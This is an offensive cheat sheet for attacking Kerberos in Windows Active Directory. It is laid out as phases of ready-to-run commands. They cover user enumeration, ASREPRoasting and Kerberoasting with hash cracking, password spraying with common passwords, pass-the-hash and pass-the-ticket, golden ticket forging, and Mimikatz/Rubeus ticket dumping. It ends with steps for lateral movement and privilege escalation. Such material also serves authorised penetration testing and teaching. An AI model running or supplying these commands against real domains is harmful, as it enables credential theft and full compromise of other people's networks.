Kerberos Authentication Service
Environment Variables / Setup
export IP=
export DOMAIN=domain.local
export DC_IP=$IP
Phase 1: Kerberos Service Discovery
Nmap Kerberos Scripts
nmap -p 88 --script=krb5-enum-users,krb5-realm $IP
Service Detection
# Check for Kerberos service
nmap -sU -sS -p 88 $IP
telnet $IP 88
Phase 2: User Enumeration
Kerberos Username Enumeration
# Using netexec
netexec smb $IP -u '' -p '' --users
# Using enum4linux-ng
enum4linux-ng -A $IP
# Using rpcclient
rpcclient -U "" -N $IP
enumdomusers
exit
Kerberos User Enumeration (Direct)
# Using kerbrute
./kerbrute userenum -d $DOMAIN --dc $DC_IP /usr/share/wordlists/seclists/Usernames/Names/names.txt
# Using nmap script
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='$DOMAIN' $IP
Phase 3: ASREPRoast Attack
Check for ASREPRoastable Users
Users with “Do not require Kerberos preauthentication” enabled:
# Using impacket-GetNPUsers
impacket-GetNPUsers $DOMAIN/ -dc-ip $DC_IP -no-pass -usersfile users.txt
# Using impacket with specific user
impacket-GetNPUsers $DOMAIN/guest -dc-ip $DC_IP -no-pass
# Using netexec
netexec ldap $IP -u users.txt -p '' --asreproast asrep_hashes.txt
Crack ASREPRoast Hashes
# Save hashes to file, then crack with hashcat
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
# Or with john
john --wordlist=/usr/share/wordlists/rockyou.txt asrep_hashes.txt
Phase 4: Kerberoasting Attack
Find Service Principal Names (SPNs)
# Using impacket-GetUserSPNs (requires valid creds)
impacket-GetUserSPNs $DOMAIN/username:password -dc-ip $DC_IP -request
# Using netexec (requires valid creds)
netexec ldap $IP -u username -p password --kerberoasting kerberoast_hashes.txt
# Alternative: Using ldapsearch if LDAP accessible
ldapsearch -x -H ldap://$IP -D "username@$DOMAIN" -w password -b "dc=$DOMAIN,dc=local" "servicePrincipalName=*" servicePrincipalName
Crack Kerberoast Hashes
# Crack TGS hashes with hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
# Or with john
john --wordlist=/usr/share/wordlists/rockyou.txt kerberoast_hashes.txt
Phase 5: Password Spraying
Kerberos Password Spraying
# Using netexec
netexec smb $IP -u users.txt -p 'Password123!' --continue-on-success
# Using kerbrute
./kerbrute passwordspray -d $DOMAIN --dc $DC_IP users.txt 'Password123!'
# Common passwords to try:
# Password123!, Welcome123!, Summer2024!, Company2024!
Phase 6: Advanced Kerberos Attacks
Overpass-the-Hash (if NTLM hash available)
# Using impacket-getTGT
impacket-getTGT $DOMAIN/username -hashes :ntlm_hash
# Set environment variable
export KRB5CCNAME=username.ccache
# Use ticket for other attacks
impacket-psexec $DOMAIN/username@target -k -no-pass
Pass-the-Ticket (if TGT/TGS available)
# Import ticket
export KRB5CCNAME=ticket.ccache
# Use ticket
impacket-psexec $DOMAIN/username@target -k -no-pass
Golden Ticket Attack (if krbtgt hash obtained)
# Create golden ticket (requires krbtgt hash)
impacket-ticketer -nthash krbtgt_hash -domain $DOMAIN -domain-sid domain_sid -spn cifs/target.domain.local username
# Use golden ticket
export KRB5CCNAME=username.ccache
impacket-psexec $DOMAIN/username@target -k -no-pass
Phase 7: Kerberos Vulnerabilities
Check for Kerberoast Vulnerabilities
Look for:
- Service accounts with weak passwords
- High-privilege service accounts (Domain Admins)
- Unconstrained delegation settings
- Constrained delegation misconfigurations
Check for ASREPRoast Vulnerabilities
Look for:
- Users with “Do not require Kerberos preauthentication”
- Service accounts with this setting
- Inactive accounts with this misconfiguration
Phase 8: Post-Exploitation Kerberos
Extract Tickets from Memory (if admin access)
# Using Mimikatz on target
sekurlsa::tickets /export
# Using Rubeus on target
Rubeus.exe dump
# Transfer tickets back to attacker machine
Ticket Manipulation
# Convert tickets between formats
impacket-ticketConverter ticket.kirbi ticket.ccache
# Renew TGT
impacket-renewTGT $DOMAIN/username -k -ccache ticket.ccache
Tools & Techniques Summary
Enumeration Tools
nmap, kerbrute, enum4linux-ng, rpcclient, netexec
Attack Tools
impacket suite (GetNPUsers, GetUserSPNs, getTGT)
hashcat, john (hash cracking)
netexec (various Kerberos attacks)
Windows Tools (for target)
Rubeus.exe (comprehensive Kerberos toolkit)
Mimikatz (ticket extraction)
Kerberos Attack Checklist
- User enumeration via multiple methods
- ASREPRoast for users without preauth
- Password spraying with common passwords
- Kerberoasting for service accounts (requires creds)
- Hash cracking for obtained hashes
- Ticket attacks if hashes/tickets obtained
- Delegation abuse checks
- Post-exploitation ticket extraction
Common Kerberos Misconfigurations
- Users with “Do not require Kerberos preauthentication”
- Service accounts with weak passwords
- Unconstrained delegation on computers
- Constrained delegation misconfigurations
- Weak encryption types (RC4) enabled
Next Steps
Once Kerberos attacks succeed:
- Use obtained credentials for lateral movement
- Check for delegation opportunities
- Extract additional tickets from compromised systems
- Escalate privileges using domain credentials